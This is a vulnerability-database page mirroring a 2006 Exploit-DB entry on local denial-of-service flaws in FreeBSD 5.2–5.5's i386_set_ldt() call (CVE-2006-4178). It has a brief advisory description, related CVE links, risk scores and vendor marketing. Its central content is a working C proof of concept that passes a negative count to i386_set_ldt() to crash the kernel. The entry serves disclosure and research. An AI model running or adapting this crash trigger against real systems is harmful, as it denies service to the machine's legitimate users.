Lucene search
+L

FreeBSD 5.x - 'I386_Set_LDT()' Multiple Local Denial of Service Vulnerabilities

🗓️ 23 Sep 2006 00:00:00Reported by Adriano LimaType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 29 Views

FreeBSD 5.x 'I386_Set_LDT()' local denial of service vulnerabilitie

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2006-4178
26 Sep 200601:43
cve
cvelist
Cvelist
CVE-2006-4178
26 Sep 200601:43
cvelist
euvd
EUVD
EUVD-2006-4168
7 Oct 202500:30
euvd
nvd
NVD
CVE-2006-4178
26 Sep 200602:07
nvd
securityvulns
securityvulns
iDefense Security Advisory 09.23.06: FreeBSD i386_set_ldt Integer Signedness Vulnerability
26 Sep 200600:00
securityvulns
// source: https://www.securityfocus.com/bid/20158/info

FreeBSD is prone to multiple local denial-of-service vulnerabilities. These issues occur because of input-validation flaws related to the handling of integers.

An attacker may leverage these issues to cause the affected computer to crash, denying service to legitimate users.

Versions 5.2 through 5.5 are vulnerable to these issues; other versions may also be affected.

#include <stdio.h>
#include <stdlib.h>
#include <machine/segments.h>
#include <machine/sysarch.h>

int main(int argc,char **argv){

    if(i386_set_ldt(LUDATA_SEL+1,NULL,-1)==-1){
        perror("i386_set_ldt");
        exit(EXIT_FAILURE);
    }

    exit(EXIT_FAILURE);
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

30 Sep 2013 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 24.9
EPSS0.00769
29